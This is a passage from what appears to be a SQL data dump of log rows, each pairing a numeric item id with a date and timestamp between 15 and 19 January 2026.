23:29:25'),(101834,3102,1,'2026-01-15','2026-01-15 00:02:38'),(101835,5420,1,'2026-01-15','2026-01-15 00:24:03'),(101836,5400,1,'2026-01-15','2026-01-15 01:39:05'),(101837,4587,1,'2026-01-15','2026-01-15 01:42:57'),(101838,3430,1,'2026-01-15','2026-01-15 02:12:36'),(101839,3486,1,'2026-01-15','2026-01-15 02:44:45'),(101840,4941,1,'2026-01-15','2026-01-15 03:43:05'),(101841,3781,1,'2026-01-15','2026-01-15 04:26:37'),(101842,1713,1,'2026-01-15','2026-01-15 04:33:44'),(101843,4827,1,'2026-01-15','2026-01-15 04:37:41'),(101844,2813,1,'2026-01-15','2026-01-15 04:51:14'),(101845,5512,1,'2026-01-15','2026-01-15 05:47:30'),(101846,91,1,'2026-01-15','2026-01-15 06:57:11'),(101847,2297,1,'2026-01-15','2026-01-15 07:11:45'),(101848,80,1,'2026-01-15','2026-01-15 07:15:13'),(101849,3247,1,'2026-01-15','2026-01-15 07:50:10'),(101850,1602,1,'2026-01-15','2026-01-15 08:14:42'),(101851,1602,1,'2026-01-15','2026-01-15 08:23:42'),(101852,1602,1,'2026-01-15','2026-01-15 08:26:34'),(101853,5582,1,'2026-01-15','2026-01-15 08:28:54'),(101854,5317,1,'2026-01-15','2026-01-15 08:34:18'),(101855,5553,1,'2026-01-15','2026-01-15 09:05:04'),(101856,5570,1,'2026-01-15','2026-01-15 09:07:39'),(101857,5561,1,'2026-01-15','2026-01-15 09:17:50'),(101858,84,1,'2026-01-15','2026-01-15 10:42:08'),(101859,1747,1,'2026-01-15','2026-01-15 10:46:46'),(101860,1877,1,'2026-01-15','2026-01-15 10:48:41'),(101861,91,1,'2026-01-15','2026-01-15 10:49:05'),(101862,5454,1,'2026-01-15','2026-01-15 11:01:10'),(101863,4950,1,'2026-01-15','2026-01-15 11:07:48'),(101864,80,1,'2026-01-15','2026-01-15 11:08:13'),(101865,4950,1,'2026-01-15','2026-01-15 11:08:25'),(101866,76,1,'2026-01-15','2026-01-15 11:09:01'),(101867,3707,1,'2026-01-15','2026-01-15 11:09:32'),(101868,5307,1,'2026-01-15','2026-01-15 11:50:38'),(101869,5598,1,'2026-01-15','2026-01-15 11:50:38'),(101870,1608,1,'2026-01-15','2026-01-15 12:32:00'),(101871,4722,1,'2026-01-15','2026-01-15 12:48:51'),(101872,4691,1,'2026-01-15','2026-01-15 12:50:17'),(101873,4950,1,'2026-01-15','2026-01-15 13:00:23'),(101874,91,1,'2026-01-15','2026-01-15 13:04:34'),(101875,4874,1,'2026-01-15','2026-01-15 13:05:49'),(101876,1718,1,'2026-01-15','2026-01-15 13:07:31'),(101877,4368,1,'2026-01-15','2026-01-15 13:09:35'),(101878,2804,1,'2026-01-15','2026-01-15 13:19:49'),(101879,4681,1,'2026-01-15','2026-01-15 13:26:50'),(101880,3069,1,'2026-01-15','2026-01-15 13:30:04'),(101881,3486,1,'2026-01-15','2026-01-15 13:53:40'),(101882,467,1,'2026-01-15','2026-01-15 14:08:25'),(101883,5692,1,'2026-01-15','2026-01-15 14:25:09'),(101884,4835,1,'2026-01-15','2026-01-15 14:33:49'),(101885,4363,1,'2026-01-15','2026-01-15 14:42:22'),(101886,5492,1,'2026-01-15','2026-01-15 14:46:30'),(101887,5682,1,'2026-01-15','2026-01-15 14:58:20'),(101888,5425,1,'2026-01-15','2026-01-15 15:29:17'),(101889,4457,1,'2026-01-15','2026-01-15 15:36:04'),(101890,3072,1,'2026-01-15','2026-01-15 15:36:10'),(101891,1743,1,'2026-01-15','2026-01-15 15:55:04'),(101892,3781,1,'2026-01-15','2026-01-15 16:05:59'),(101893,1582,1,'2026-01-15','2026-01-15 16:11:23'),(101894,4950,1,'2026-01-15','2026-01-15 16:39:55'),(101895,3727,1,'2026-01-15','2026-01-15 16:45:40'),(101896,4944,1,'2026-01-15','2026-01-15 17:26:11'),(101897,4950,1,'2026-01-15','2026-01-15 17:28:18'),(101898,4950,1,'2026-01-15','2026-01-15 17:35:50'),(101899,4950,1,'2026-01-15','2026-01-15 17:36:36'),(101900,4950,1,'2026-01-15','2026-01-15 17:36:45'),(101901,4950,1,'2026-01-15','2026-01-15 17:37:22'),(101902,5502,1,'2026-01-15','2026-01-15 18:43:06'),(101903,5495,1,'2026-01-15','2026-01-15 18:59:49'),(101904,5409,1,'2026-01-15','2026-01-15 20:03:25'),(101905,89,1,'2026-01-15','2026-01-15 20:22:52'),(101906,3781,1,'2026-01-15','2026-01-15 20:49:17'),(101907,3069,1,'2026-01-15','2026-01-15 21:22:41'),(101908,5397,1,'2026-01-15','2026-01-15 21:39:50'),(101909,5406,1,'2026-01-15','2026-01-15 21:47:21'),(101910,5146,1,'2026-01-15','2026-01-15 22:15:28'),(101911,5428,1,'2026-01-15','2026-01-15 22:18:28'),(101912,5605,1,'2026-01-15','2026-01-15 22:18:31'),(101913,4719,1,'2026-01-15','2026-01-15 22:20:27'),(101914,3005,1,'2026-01-15','2026-01-15 22:27:47'),(101915,1730,1,'2026-01-15','2026-01-15 22:41:10'),(101916,4950,1,'2026-01-15','2026-01-15 22:47:34'),(101917,80,1,'2026-01-15','2026-01-15 22:54:57'),(101918,5441,1,'2026-01-15','2026-01-15 23:40:46'),(101919,3752,1,'2026-01-15','2026-01-15 23:54:18'),(101920,4520,1,'2026-01-16','2026-01-16 00:12:25'),(101921,76,1,'2026-01-16','2026-01-16 00:19:51'),(101922,76,1,'2026-01-16','2026-01-16 00:23:30'),(101923,76,1,'2026-01-16','2026-01-16 01:19:49'),(101924,76,1,'2026-01-16','2026-01-16 01:19:56'),(101925,76,1,'2026-01-16','2026-01-16 01:20:18'),(101926,76,1,'2026-01-16','2026-01-16 01:22:59'),(101927,76,1,'2026-01-16','2026-01-16 01:30:33'),(101928,76,1,'2026-01-16','2026-01-16 01:30:46'),(101929,5259,1,'2026-01-16','2026-01-16 02:40:58'),(101930,1722,1,'2026-01-16','2026-01-16 03:30:24'),(101931,5512,1,'2026-01-16','2026-01-16 03:52:40'),(101932,5457,1,'2026-01-16','2026-01-16 03:53:43'),(101933,1582,1,'2026-01-16','2026-01-16 03:54:38'),(101934,4944,1,'2026-01-16','2026-01-16 04:30:57'),(101935,3030,1,'2026-01-16','2026-01-16 04:31:22'),(101936,1770,1,'2026-01-16','2026-01-16 04:33:27'),(101937,4960,1,'2026-01-16','2026-01-16 05:27:25'),(101938,4660,1,'2026-01-16','2026-01-16 05:40:10'),(101939,5080,1,'2026-01-16','2026-01-16 05:42:28'),(101940,5397,1,'2026-01-16','2026-01-16 05:42:33'),(101941,4663,1,'2026-01-16','2026-01-16 05:42:36'),(101942,91,1,'2026-01-16','2026-01-16 05:42:38'),(101943,4335,1,'2026-01-16','2026-01-16 06:28:33'),(101944,4963,1,'2026-01-16','2026-01-16 06:43:34'),(101945,5295,1,'2026-01-16','2026-01-16 06:58:28'),(101946,91,1,'2026-01-16','2026-01-16 07:00:25'),(101947,3275,1,'2026-01-16','2026-01-16 07:03:39'),(101948,5146,1,'2026-01-16','2026-01-16 07:05:48'),(101949,72,1,'2026-01-16','2026-01-16 07:08:40'),(101950,5343,1,'2026-01-16','2026-01-16 07:11:38'),(101951,3297,1,'2026-01-16','2026-01-16 07:13:31'),(101952,5137,1,'2026-01-16','2026-01-16 07:28:28'),(101953,4576,1,'2026-01-16','2026-01-16 07:52:35'),(101954,4494,1,'2026-01-16','2026-01-16 08:35:38'),(101955,4950,1,'2026-01-16','2026-01-16 08:58:32'),(101956,1730,1,'2026-01-16','2026-01-16 09:04:36'),(101957,1582,1,'2026-01-16','2026-01-16 09:29:15'),(101958,5420,1,'2026-01-16','2026-01-16 09:59:17'),(101959,4529,1,'2026-01-16','2026-01-16 10:02:41'),(101960,4771,1,'2026-01-16','2026-01-16 10:40:38'),(101961,5425,1,'2026-01-16','2026-01-16 10:42:25'),(101962,3691,1,'2026-01-16','2026-01-16 11:26:36'),(101963,4845,1,'2026-01-16','2026-01-16 11:31:59'),(101964,5567,1,'2026-01-16','2026-01-16 12:34:18'),(101965,87,1,'2026-01-16','2026-01-16 12:34:25'),(101966,87,1,'2026-01-16','2026-01-16 12:34:27'),(101967,4950,1,'2026-01-16','2026-01-16 12:34:30'),(101968,4950,1,'2026-01-16','2026-01-16 12:34:39'),(101969,1582,1,'2026-01-16','2026-01-16 14:07:49'),(101970,4950,1,'2026-01-16','2026-01-16 14:36:02'),(101971,87,1,'2026-01-16','2026-01-16 14:36:54'),(101972,484,1,'2026-01-16','2026-01-16 14:37:16'),(101973,4930,1,'2026-01-16','2026-01-16 14:40:19'),(101974,4941,1,'2026-01-16','2026-01-16 14:40:35'),(101975,1718,1,'2026-01-16','2026-01-16 15:02:27'),(101976,4977,1,'2026-01-16','2026-01-16 15:12:36'),(101977,2804,1,'2026-01-16','2026-01-16 15:13:16'),(101978,1768,1,'2026-01-16','2026-01-16 15:15:53'),(101979,5343,1,'2026-01-16','2026-01-16 15:16:18'),(101980,5593,1,'2026-01-16','2026-01-16 15:19:57'),(101981,4335,1,'2026-01-16','2026-01-16 15:45:51'),(101982,3034,1,'2026-01-16','2026-01-16 15:51:39'),(101983,5512,1,'2026-01-16','2026-01-16 16:03:17'),(101984,3030,1,'2026-01-16','2026-01-16 16:07:05'),(101985,3749,1,'2026-01-16','2026-01-16 16:15:44'),(101986,4950,1,'2026-01-16','2026-01-16 16:39:10'),(101987,68,1,'2026-01-16','2026-01-16 16:41:38'),(101988,1745,1,'2026-01-16','2026-01-16 17:16:43'),(101989,1586,1,'2026-01-16','2026-01-16 17:28:08'),(101990,76,1,'2026-01-16','2026-01-16 17:28:55'),(101991,2558,1,'2026-01-16','2026-01-16 17:56:40'),(101992,5037,1,'2026-01-16','2026-01-16 18:33:11'),(101993,5310,1,'2026-01-16','2026-01-16 19:13:36'),(101994,4712,1,'2026-01-16','2026-01-16 19:41:28'),(101995,5502,1,'2026-01-16','2026-01-16 19:43:00'),(101996,5461,1,'2026-01-16','2026-01-16 19:43:00'),(101997,3307,1,'2026-01-16','2026-01-16 20:24:26'),(101998,3316,1,'2026-01-16','2026-01-16 21:00:09'),(101999,4966,1,'2026-01-16','2026-01-16 21:12:13'),(102000,4950,1,'2026-01-16','2026-01-16 21:13:19'),(102001,4963,1,'2026-01-16','2026-01-16 21:13:24'),(102002,5666,1,'2026-01-16','2026-01-16 21:24:19'),(102003,5666,1,'2026-01-16','2026-01-16 21:24:39'),(102004,5666,1,'2026-01-16','2026-01-16 21:28:23'),(102005,4587,1,'2026-01-16','2026-01-16 21:50:39'),(102006,5157,1,'2026-01-16','2026-01-16 21:55:13'),(102007,2904,1,'2026-01-16','2026-01-16 22:14:15'),(102008,2904,1,'2026-01-16','2026-01-16 22:17:03'),(102009,5461,1,'2026-01-16','2026-01-16 22:23:43'),(102010,5512,1,'2026-01-16','2026-01-16 22:35:16'),(102011,4950,1,'2026-01-16','2026-01-16 22:55:33'),(102012,2457,1,'2026-01-16','2026-01-16 23:35:45'),(102013,5515,1,'2026-01-17','2026-01-17 00:06:30'),(102014,5433,1,'2026-01-17','2026-01-17 00:43:57'),(102015,5028,1,'2026-01-17','2026-01-17 01:22:06'),(102016,5666,1,'2026-01-17','2026-01-17 01:25:32'),(102017,4930,1,'2026-01-17','2026-01-17 01:32:03'),(102018,5499,1,'2026-01-17','2026-01-17 01:33:31'),(102019,4950,1,'2026-01-17','2026-01-17 01:40:00'),(102020,3721,1,'2026-01-17','2026-01-17 03:36:59'),(102021,1728,1,'2026-01-17','2026-01-17 03:54:07'),(102022,1586,1,'2026-01-17','2026-01-17 04:14:02'),(102023,469,1,'2026-01-17','2026-01-17 04:24:53'),(102024,5570,1,'2026-01-17','2026-01-17 06:06:11'),(102025,1703,1,'2026-01-17','2026-01-17 07:02:30'),(102026,2813,1,'2026-01-17','2026-01-17 07:02:40'),(102027,91,1,'2026-01-17','2026-01-17 07:06:08'),(102028,5454,1,'2026-01-17','2026-01-17 07:55:29'),(102029,5157,1,'2026-01-17','2026-01-17 08:03:56'),(102030,5530,1,'2026-01-17','2026-01-17 08:11:22'),(102031,470,1,'2026-01-17','2026-01-17 08:23:25'),(102032,3038,1,'2026-01-17','2026-01-17 08:34:26'),(102033,3023,1,'2026-01-17','2026-01-17 08:47:24'),(102034,4335,1,'2026-01-17','2026-01-17 09:23:11'),(102035,1870,1,'2026-01-17','2026-01-17 09:38:20'),(102036,2804,1,'2026-01-17','2026-01-17 09:53:14'),(102037,3297,1,'2026-01-17','2026-01-17 10:13:20'),(102038,5400,1,'2026-01-17','2026-01-17 10:42:56'),(102039,1602,1,'2026-01-17','2026-01-17 10:46:17'),(102040,5636,1,'2026-01-17','2026-01-17 11:11:48'),(102041,5116,1,'2026-01-17','2026-01-17 11:38:09'),(102042,2410,1,'2026-01-17','2026-01-17 12:33:18'),(102043,4976,1,'2026-01-17','2026-01-17 13:35:47'),(102044,5292,1,'2026-01-17','2026-01-17 13:39:21'),(102045,471,1,'2026-01-17','2026-01-17 13:43:34'),(102046,5146,1,'2026-01-17','2026-01-17 14:16:22'),(102047,5409,1,'2026-01-17','2026-01-17 14:24:40'),(102048,469,1,'2026-01-17','2026-01-17 14:28:39'),(102049,5578,1,'2026-01-17','2026-01-17 14:39:08'),(102050,4551,1,'2026-01-17','2026-01-17 14:51:53'),(102051,469,1,'2026-01-17','2026-01-17 14:58:53'),(102052,5425,1,'2026-01-17','2026-01-17 17:06:30'),(102053,76,1,'2026-01-17','2026-01-17 17:08:28'),(102054,5567,1,'2026-01-17','2026-01-17 17:18:28'),(102055,5295,1,'2026-01-17','2026-01-17 17:36:03'),(102056,2411,1,'2026-01-17','2026-01-17 17:36:41'),(102057,3006,1,'2026-01-17','2026-01-17 17:43:28'),(102058,4719,1,'2026-01-17','2026-01-17 17:43:39'),(102059,5626,1,'2026-01-17','2026-01-17 18:10:12'),(102060,3261,1,'2026-01-17','2026-01-17 18:16:16'),(102061,5526,1,'2026-01-17','2026-01-17 18:19:30'),(102062,3005,1,'2026-01-17','2026-01-17 18:21:38'),(102063,5502,1,'2026-01-17','2026-01-17 18:33:45'),(102064,2993,1,'2026-01-17','2026-01-17 18:53:17'),(102065,472,1,'2026-01-17','2026-01-17 19:43:22'),(102066,1705,1,'2026-01-17','2026-01-17 20:06:26'),(102067,3069,1,'2026-01-17','2026-01-17 20:49:48'),(102068,1705,1,'2026-01-17','2026-01-17 20:52:09'),(102069,5492,1,'2026-01-17','2026-01-17 22:36:51'),(102070,5626,1,'2026-01-17','2026-01-17 22:42:51'),(102071,3752,1,'2026-01-17','2026-01-17 22:57:56'),(102072,72,1,'2026-01-18','2026-01-18 00:41:17'),(102073,108,1,'2026-01-18','2026-01-18 00:41:25'),(102074,468,1,'2026-01-18','2026-01-18 00:41:31'),(102075,84,1,'2026-01-18','2026-01-18 00:41:36'),(102076,474,1,'2026-01-18','2026-01-18 00:41:41'),(102077,5636,1,'2026-01-18','2026-01-18 00:41:46'),(102078,2503,1,'2026-01-18','2026-01-18 00:41:51'),(102079,1877,1,'2026-01-18','2026-01-18 00:41:55'),(102080,335,1,'2026-01-18','2026-01-18 00:42:05'),(102081,5662,1,'2026-01-18','2026-01-18 00:42:09'),(102082,5696,1,'2026-01-18','2026-01-18 00:42:14'),(102083,2904,1,'2026-01-18','2026-01-18 00:42:23'),(102084,91,1,'2026-01-18','2026-01-18 00:42:28'),(102085,5683,1,'2026-01-18','2026-01-18 00:42:39'),(102086,1872,1,'2026-01-18','2026-01-18 00:42:44'),(102087,76,1,'2026-01-18','2026-01-18 00:42:49'),(102088,74,1,'2026-01-18','2026-01-18 00:42:53'),(102089,4930,1,'2026-01-18','2026-01-18 00:42:59'),(102090,473,1,'2026-01-18','2026-01-18 00:43:03'),(102091,80,1,'2026-01-18','2026-01-18 00:43:08'),(102092,68,1,'2026-01-18','2026-01-18 00:43:18'),(102093,470,1,'2026-01-18','2026-01-18 00:43:23'),(102094,89,1,'2026-01-18','2026-01-18 00:43:28'),(102095,1870,1,'2026-01-18','2026-01-18 00:43:34'),(102096,487,1,'2026-01-18','2026-01-18 00:43:39'),(102097,87,1,'2026-01-18','2026-01-18 00:43:44'),(102098,5657,1,'2026-01-18','2026-01-18 01:01:20'),(102099,72,1,'2026-01-18','2026-01-18 01:01:28'),(102100,5682,1,'2026-01-18','2026-01-18 01:01:35'),(102101,5692,1,'2026-01-18','2026-01-18 01:01:39'),(102102,5653,1,'2026-01-18','2026-01-18 01:01:44'),(102103,72,1,'2026-01-18','2026-01-18 01:01:50'),(102104,5631,1,'2026-01-18','2026-01-18 01:01:57'),(102105,5649,1,'2026-01-18','2026-01-18 01:02:02'),(102106,5618,1,'2026-01-18','2026-01-18 01:02:07'),(102107,72,1,'2026-01-18','2026-01-18 01:02:13'),(102108,5639,1,'2026-01-18','2026-01-18 01:02:19'),(102109,5622,1,'2026-01-18','2026-01-18 01:02:25'),(102110,5643,1,'2026-01-18','2026-01-18 01:02:30'),(102111,72,1,'2026-01-18','2026-01-18 01:02:36'),(102112,469,1,'2026-01-18','2026-01-18 01:02:42'),(102113,467,1,'2026-01-18','2026-01-18 01:02:47'),(102114,3691,1,'2026-01-18','2026-01-18 01:02:57'),(102115,3664,1,'2026-01-18','2026-01-18 01:03:20'),(102116,3694,1,'2026-01-18','2026-01-18 01:03:25'),(102117,476,1,'2026-01-18','2026-01-18 01:03:36'),(102118,5605,1,'2026-01-18','2026-01-18 01:03:42'),(102119,5582,1,'2026-01-18','2026-01-18 01:04:02'),(102120,5598,1,'2026-01-18','2026-01-18 01:04:06'),(102121,5593,1,'2026-01-18','2026-01-18 01:04:11'),(102122,5601,1,'2026-01-18','2026-01-18 01:04:15'),(102123,5585,1,'2026-01-18','2026-01-18 01:04:20'),(102124,102,1,'2026-01-18','2026-01-18 01:04:39'),(102125,5378,1,'2026-01-18','2026-01-18 01:04:44'),(102126,5326,1,'2026-01-18','2026-01-18 01:04:55'),(102127,5666,1,'2026-01-18','2026-01-18 01:05:00'),(102128,5415,1,'2026-01-18','2026-01-18 01:05:27'),(102129,5146,1,'2026-01-18','2026-01-18 01:05:32'),(102130,5674,1,'2026-01-18','2026-01-18 01:05:37'),(102131,5248,1,'2026-01-18','2026-01-18 01:05:42'),(102132,5330,1,'2026-01-18','2026-01-18 01:05:47'),(102133,5374,1,'2026-01-18','2026-01-18 01:06:11'),(102134,5383,1,'2026-01-18','2026-01-18 01:06:17'),(102135,5259,1,'2026-01-18','2026-01-18 01:06:22'),(102136,5153,1,'2026-01-18','2026-01-18 01:06:27'),(102137,5363,1,'2026-01-18','2026-01-18 01:06:33'),(102138,5080,1,'2026-01-18','2026-01-18 01:06:53'),(102139,5140,1,'2026-01-18','2026-01-18 01:06:59'),(102140,5609,1,'2026-01-18','2026-01-18 01:07:04'),(102141,5076,1,'2026-01-18','2026-01-18 01:07:14'),(102142,5264,1,'2026-01-18','2026-01-18 01:07:19'),(102143,5157,1,'2026-01-18','2026-01-18 01:07:26'),(102144,5626,1,'2026-01-18','2026-01-18 01:07:30'),(102145,1582,1,'2026-01-18','2026-01-18 01:07:41'),(102146,2503,1,'2026-01-18','2026-01-18 01:07:48'),(102147,4941,1,'2026-01-18','2026-01-18 01:07:52'),(102148,4911,1,'2026-01-18','2026-01-18 01:07:57'),(102149,4938,1,'2026-01-18','2026-01-18 01:08:02'),(102150,4966,1,'2026-01-18','2026-01-18 01:08:07'),(102151,4950,1,'2026-01-18','2026-01-18 01:08:12'),(102152,4963,1,'2026-01-18','2026-01-18 01:08:18'),(102153,4944,1,'2026-01-18','2026-01-18 01:08:22'),(102154,4960,1,'2026-01-18','2026-01-18 01:08:28'),(102155,472,1,'2026-01-18','2026-01-18 01:08:33'),(102156,2411,1,'2026-01-18','2026-01-18 01:08:38'),(102157,2420,1,'2026-01-18','2026-01-18 01:08:43'),(102158,2410,1,'2026-01-18','2026-01-18 01:08:48'),(102159,2419,1,'2026-01-18','2026-01-18 01:08:52'),(102160,2395,1,'2026-01-18','2026-01-18 01:08:59'),(102161,471,1,'2026-01-18','2026-01-18 01:09:05'),(102162,1608,1,'2026-01-18','2026-01-18 01:09:11'),(102163,1584,1,'2026-01-18','2026-01-18 01:09:16'),(102164,1602,1,'2026-01-18','2026-01-18 01:09:22'),(102165,1596,1,'2026-01-18','2026-01-18 01:09:28'),(102166,1588,1,'2026-01-18','2026-01-18 01:09:34'),(102167,1590,1,'2026-01-18','2026-01-18 01:09:39'),(102168,1604,1,'2026-01-18','2026-01-18 01:09:45'),(102169,1606,1,'2026-01-18','2026-01-18 01:09:51'),(102170,1592,1,'2026-01-18','2026-01-18 01:09:57'),(102171,1598,1,'2026-01-18','2026-01-18 01:10:02'),(102172,1586,1,'2026-01-18','2026-01-18 01:10:08'),(102173,89,1,'2026-01-18','2026-01-18 01:10:13'),(102174,1594,1,'2026-01-18','2026-01-18 01:10:19'),(102175,1600,1,'2026-01-18','2026-01-18 01:10:26'),(102176,1544,1,'2026-01-18','2026-01-18 01:10:31'),(102177,89,1,'2026-01-18','2026-01-18 01:10:37'),(102178,488,1,'2026-01-18','2026-01-18 01:10:44'),(102179,486,1,'2026-01-18','2026-01-18 01:10:48'),(102180,477,1,'2026-01-18','2026-01-18 01:10:54'),(102181,482,1,'2026-01-18','2026-01-18 01:10:59'),(102182,485,1,'2026-01-18','2026-01-18 01:11:09'),(102183,484,1,'2026-01-18','2026-01-18 01:11:14'),(102184,478,1,'2026-01-18','2026-01-18 01:11:25'),(102185,481,1,'2026-01-18','2026-01-18 01:11:30'),(102186,479,1,'2026-01-18','2026-01-18 01:11:35'),(102187,480,1,'2026-01-18','2026-01-18 01:11:39'),(102188,483,1,'2026-01-18','2026-01-18 01:11:44'),(102189,5522,1,'2026-01-18','2026-01-18 01:22:47'),(102190,5495,1,'2026-01-18','2026-01-18 01:22:55'),(102191,5507,1,'2026-01-18','2026-01-18 01:23:00'),(102192,1877,1,'2026-01-18','2026-01-18 01:34:35'),(102193,5492,1,'2026-01-18','2026-01-18 01:34:39'),(102194,5512,1,'2026-01-18','2026-01-18 01:53:39'),(102195,3486,1,'2026-01-18','2026-01-18 02:11:58'),(102196,3738,1,'2026-01-18','2026-01-18 02:13:56'),(102197,4660,1,'2026-01-18','2026-01-18 03:14:19'),(102198,5492,1,'2026-01-18','2026-01-18 03:41:01'),(102199,5570,1,'2026-01-18','2026-01-18 04:08:28'),(102200,5005,1,'2026-01-18','2026-01-18 04:10:53'),(102201,4950,1,'2026-01-18','2026-01-18 04:28:51'),(102202,5454,1,'2026-01-18','2026-01-18 04:39:19'),(102203,468,1,'2026-01-18','2026-01-18 05:29:07'),(102204,2609,1,'2026-01-18','2026-01-18 05:53:39'),(102205,76,1,'2026-01-18','2026-01-18 05:59:06'),(102206,91,1,'2026-01-18','2026-01-18 06:02:46'),(102207,91,1,'2026-01-18','2026-01-18 07:10:17'),(102208,4529,1,'2026-01-18','2026-01-18 08:04:07'),(102209,5467,1,'2026-01-18','2026-01-18 08:09:53'),(102210,1766,1,'2026-01-18','2026-01-18 08:22:26'),(102211,472,1,'2026-01-18','2026-01-18 08:43:15'),(102212,4612,1,'2026-01-18','2026-01-18 09:33:12'),(102213,3282,1,'2026-01-18','2026-01-18 10:07:46'),(102214,467,1,'2026-01-18','2026-01-18 12:34:24'),(102215,4510,1,'2026-01-18','2026-01-18 12:55:00'),(102216,4862,1,'2026-01-18','2026-01-18 13:10:57'),(102217,3251,1,'2026-01-18','2026-01-18 14:53:36'),(102218,4612,1,'2026-01-18','2026-01-18 15:05:38'),(102219,5489,1,'2026-01-18','2026-01-18 15:12:01'),(102220,4963,1,'2026-01-18','2026-01-18 15:14:46'),(102221,4722,1,'2026-01-18','2026-01-18 16:02:26'),(102222,1772,1,'2026-01-18','2026-01-18 16:33:22'),(102223,471,1,'2026-01-18','2026-01-18 16:53:31'),(102224,3117,1,'2026-01-18','2026-01-18 17:27:22'),(102225,4950,1,'2026-01-18','2026-01-18 17:54:53'),(102226,5125,1,'2026-01-18','2026-01-18 18:30:31'),(102227,3038,1,'2026-01-18','2026-01-18 18:34:09'),(102228,1728,1,'2026-01-18','2026-01-18 18:50:37'),(102229,5125,1,'2026-01-18','2026-01-18 18:51:47'),(102230,3307,1,'2026-01-18','2026-01-18 18:57:48'),(102231,4776,1,'2026-01-18','2026-01-18 19:03:34'),(102232,3267,1,'2026-01-18','2026-01-18 19:11:15'),(102233,5337,1,'2026-01-18','2026-01-18 19:44:59'),(102234,2411,1,'2026-01-18','2026-01-18 19:51:02'),(102235,5454,1,'2026-01-18','2026-01-18 19:54:06'),(102236,3777,1,'2026-01-18','2026-01-18 20:36:30'),(102237,5428,1,'2026-01-18','2026-01-18 20:38:36'),(102238,5502,1,'2026-01-18','2026-01-18 20:42:02'),(102239,3781,1,'2026-01-18','2026-01-18 20:45:06'),(102240,3045,1,'2026-01-18','2026-01-18 20:52:53'),(102241,5363,1,'2026-01-18','2026-01-18 21:14:30'),(102242,3083,1,'2026-01-18','2026-01-18 21:25:09'),(102243,5397,1,'2026-01-18','2026-01-18 21:25:24'),(102244,4335,1,'2026-01-18','2026-01-18 21:32:31'),(102245,2804,1,'2026-01-18','2026-01-18 22:07:43'),(102246,5515,1,'2026-01-18','2026-01-18 22:15:05'),(102247,4977,1,'2026-01-18','2026-01-18 22:41:11'),(102248,5433,1,'2026-01-18','2026-01-18 22:48:04'),(102249,4722,1,'2026-01-19','2026-01-19 00:25:39'),(102250,5570,1,'2026-01-19','2026-01-19 00:39:47'),(102251,5163,1,'2026-01-19','2026-01-19 01:38:50'),(102252,5436,1,'2026-01-19','2026-01-19 01:40:20'),(102253,5449,1,'2026-01-19','2026-01-19 01:43:24'),(102254,76,1,'2026-01-19','2026-01-19 01:43:25'),(102255,80,1,'2026-01-19','2026-01-19 01:43:49'),(102256,2410,1,'2026-01-19','2026-01-19 01:47:07'),(102257,72,1,'2026-01-19','2026-01-19 02:05:12'),(102258,5457,1,'2026-01-19','2026-01-19 02:42:04'),(102259,2410,1,'2026-01-19','2026-01-19 02:54:22'),(102260,470,1,'2026-01-19','2026-01-19 03:27:04'),(102261,2395,1,'2026-01-19','2026-01-19 03:29:51'),(102262,3664,1,'2026-01-19','2026-01-19 04:21:18'),(102263,5631,1,'2026-01-19','2026-01-19 04:24:53'),(102264,4911,1,'2026-01-19','2026-01-19 04:30:30'),(102265,4983,1,'2026-01-19','2026-01-19 05:04:27'),(102266,5054,1,'2026-01-19','2026-01-19 05:13:18'),(102267,5454,1,'2026-01-19','2026-01-19 06:05:14'),(102268,5363,1,'2026-01-19','2026-01-19 06:27:04'),(102269,5472,1,'2026-01-19','2026-01-19 06:49:23'),(102270,5461,1,'2026-01-19','2026-01-19 06:58:07'),(102271,5280,1,'2026-01-19','2026-01-19 07:07:20'),(102272,3486,1,'2026-01-19','2026-01-19 07:11:25'),(102273,91,1,'2026-01-19','2026-01-19 07:13:35'),(102274,4645,1,'2026-01-19','2026-01-19 07:33:16'),(102275,3053,1,'2026-01-19','2026-01-19 07:36:33'),(102276,4556,1,'2026-01-19','2026-01-19 07:40:13'),(102277,2419,1,'2026-01-19','2026-01-19 07:52:51'),(102278,5400,1,'2026-01-19','2026-01-19 08:38:50'),(102279,68,1,'2026-01-19','2026-01-19 08:42:43'),(102280,4950,1,'2026-01-19','2026-01-19 08:50:39'),(102281,5512,1,'2026-01-19','2026-01-19 09:05:08'),(102282,1718,1,'2026-01-19','2026-01-19 09:09:52'),(102283,5502,1,'2026-01-19','2026-01-19 09:28:39'),(102284,3724,1,'2026-01-19','2026-01-19 09:56:48'),(102285,5276,1,'2026-01-19','2026-01-19 10:02:45'),(102286,5666,1,'2026-01-19','2026-01-19 10:09:41'),(102287,5409,1,'2026-01-19','2026-01-19 10:16:05'),(102288,4329,1,'2026-01-19','2026-01-19 10:24:38'),(102289,4911,1,'2026-01-19','2026-01-19 10:35:42'),(102290,76,1,'2026-01-19','2026-01-19 10:38:44'),(102291,5425,1,'2026-01-19','2026-01-19 10:49:43'),(102292,1614,1,'2026-01-19','2026-01-19 10:50:11'),(102293,1614,1,'2026-01-19','2026-01-19 10:50:51'),(102294,4950,1,'2026-01-19','2026-01-19 10:58:49'),(102295,5276,1,'2026-01-19','2026-01-19 11:10:30'),(102296,5593,1,'2026-01-19','2026-01-19 11:21:02'),(102297,5259,1,'2026-01-19','2026-01-19 11:36:58'),(102298,1722,1,'2026-01-19','2026-01-19 11:58:41'),(102299,3229,1,'2026-01-19','2026-01-19 12:07:16'),(102300,4960,1,'2026-01-19','2026-01-19 12:14:44'),(102301,5163,1,'2026-01-19','2026-01-19 12:17:33'),(102302,3781,1,'2026-01-19','2026-01-19 12:18:50'),(102303,5054,1,'2026-01-19','2026-01-19 12:27:14'),(102304,3083,1,'2026-01-19','2026-01-19 12:51:25'),(102305,1608,1,'2026-01-19','2026-01-19 13:22:56'),(102306,1582,1,'2026-01-19','2026-01-19 13:29:28'),(102307,5578,1,'2026-01-19','2026-01-19 13:38:45'),(102308,110,1,'2026-01-19','2026-01-19 13:49:19'),(102309,4944,1,'2026-01-19','2026-01-19 14:09:20'),(102310,5666,1,'2026-01-19','2026-01-19 14:15:17'),(102311,4681,1,'2026-01-19','2026-01-19 14:18:28'),(102312,5666,1,'2026-01-19','2026-01-19 14:24:24'),(102313,5420,1,'2026-01-19','2026-01-19 14:32:41'),(102314,5649,1,'2026-01-19','2026-01-19 14:35:45'),(102315,5649,1,'2026-01-19','2026-01-19 14:39:15'),(102316,5454,1,'2026-01-19','2026-01-19 14:49:17'),(102317,5502,1,'2026-01-19','2026-01-19 14:52:16'),(102318,5464,1,'2026-01-19','2026-01-19 14:59:27'),(102319,4712,1,'2026-01-19','2026-01-19 